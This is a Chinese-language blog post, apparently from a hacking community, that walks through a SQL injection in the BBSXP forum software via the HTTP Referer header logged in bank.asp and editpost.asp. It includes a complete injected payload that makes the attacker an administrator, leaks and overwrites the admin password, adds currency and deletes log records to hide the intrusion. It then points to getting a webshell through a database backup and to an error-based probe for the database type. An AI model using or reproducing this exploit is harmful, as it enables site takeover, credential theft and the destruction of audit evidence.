bbsxp log注入
By WhyTt
参数直接带如查询的函数和过程
menu
BBSList
ForumTree
Log
ShowRank
ShowRole
DelFile//deletefile
还记的以前在blog发的一篇bbsxp分析文档,http://computer.mblogger.cn/whytt/posts/59457.aspx
由于当时只看到在监狱那里有对log的引用,而没看到这里居然还有,所以一直没继续看下去,考试大部分完了,现在每天没撒事,于是看看代码打发时间,今天早上选的是bbsxp来开刀,嘿嘿~~~~
在bank.asp这个文件中,在倒数第6行那里有个对log过程的引用,
就是在银行转帐这里,思路是这里的。
先注册2个用户,拿一个用户跟几个帖子,赚10个金币,然后去银行那里去转帐,选自己刚才注册的另一个用户,然后抓个包,修改数据包里的相关参数,具体请看log过程
sub Log(Message)
if Request.ServerVariables("Query_String")<>"" then Query_String="?"&Request.ServerVariables("Query_String")&""
Conn.Execute("insert into [BBSXP_Log] (UserName,IPAddress,UserAgent,HttpVerb,PathAndQuery,Referrer,ErrDescription,POSTData,Notes) values ('"&CookieUserName&"','"&Request.ServerVariables("REMOTE_ADDR")&"','"&HTMLEncode(Request.Servervariables("HTTP_User_AGENT"))&"','"&Request.ServerVariables("request_method")&"','http://"&Request.ServerVariables("server_name")&""&Request.ServerVariables("script_name")&""&Query_String&"','"&Request.ServerVariables("HTTP_REFERER")&"','"&Err.Description&"','"&Request.Form&"','"&Message&"')")
end sub
我们就拿其中的Request.ServerVariables("HTTP_REFERER")来注入,这个log过程在我转帐的时候执行的查询
insert into [BBSXP_Log] (UserName,IPAddress,UserAgent,HttpVerb,PathAndQuery,Referrer,ErrDescription,POSTData,Notes) values ('whytt1','127.0.0.1','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)','POST','http://127.0.0.1/Bank.asp','http://127.0.0.1/Bank.asp','','menu=virement&qmoney=10&dxname=whytt&B2=+%C8%B7+%B6%A8+','whytt1 通过银行转帐 ¥10 给 whytt')
其中最后一个http://127.0.0.1/Bank.asp就是我们需要修改的Request.ServerVariables("HTTP_REFERER"),为http://127.0.0.1/Bank.asp','','menu=virement&qmoney=10&dxname=whytt&B2=+%C8%B7+%B6%A8+','whytt1 通过银行转帐 ¥10 给 whytt');update bbsxp_users set userRoleid=1,usermoney=999,usermail=(select top 1 adminpassword from bbsxp_sitesettings) where username='whytt';update bbsxp_sitesettings set adminpassword=(select userpass from bbsxp_users where username='whytt');delete from bbsxp_log where username='tt521' or username='xiaot';–
这样带入查询就是:
insert into [BBSXP_Log] (UserName,IPAddress,UserAgent,HttpVerb,PathAndQuery,Referrer,ErrDescription,POSTData,Notes) values ('whytt1','127.0.0.1','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)','POST','http://127.0.0.1/Bank.asp','http://127.0.0.1/Bank.asp','','menu=virement&qmoney=10&dxname=whytt&B2=+%C8%B7+%B6%A8+','whytt1 通过银行转帐 ¥10 给 whytt');update bbsxp_users set userRoleid=1,usermoney=999,usermail=(select top 1 adminpassword from bbsxp_sitesettings) where username='whytt';update bbsxp_sitesettings set adminpassword=(select userpass from bbsxp_users where username='whytt');delete from bbsxp_log where username='tt521' or username='xiaot';–这样就把我们的whytt设置成了管理员了,而且把后台密码输出到whytt的油箱那里,而且给自己加上了999 的金币,哈哈够用了吧。最后删除log表中我们的操作记录,最后然后进后台看web的绝对路径,然后通过backup log来拿webshell。
By WhyTt
补充:为了进一步确认数据库的类型,可以通过bbsxp的一个小bug来实现。
http://127.0.0.1/UserTop.asp?order='whytt''0
这里有时候不暴错,就在后面乱加些字符吧。。呵呵~~~我测试过,加了几次就暴错,就看到数据库的类型了。 :)
后来发现用bank.asp这里来搞非常费力,要有足够的金币,所以又专门找了下其他asp文件,发现在
if Request.Form("UpFileID")<>"" then
UpFileID=split(Request.form("UpFileID"),",")
for i = 0 to ubound(UpFileID)-1
Conn.execute("update [BBSXP_UpFiles] set Category='"&Category&"',Description='"&Subject&"' where id="&int(UpFileID(i))&" and UserName='"&CookieUserName&"'")
next
end if
response.write ("<script>alert()</script>")
Log("修改帖子成功,主题ID:"&ThreadID&",帖子ID:"&PostID&"")
这个editpost.asp文件也有对log过程的引用,于是方法简单了,发个帖子,然后edit,然后修改抓到的数据包,重复修改Request.ServerVariables("HTTP_REFERER"),就可以达到同样的效果,呵呵~~
抢楼还有机会... 抢座、Rss 2.0或者 Trackback
1 Trackbacks/Pingbacks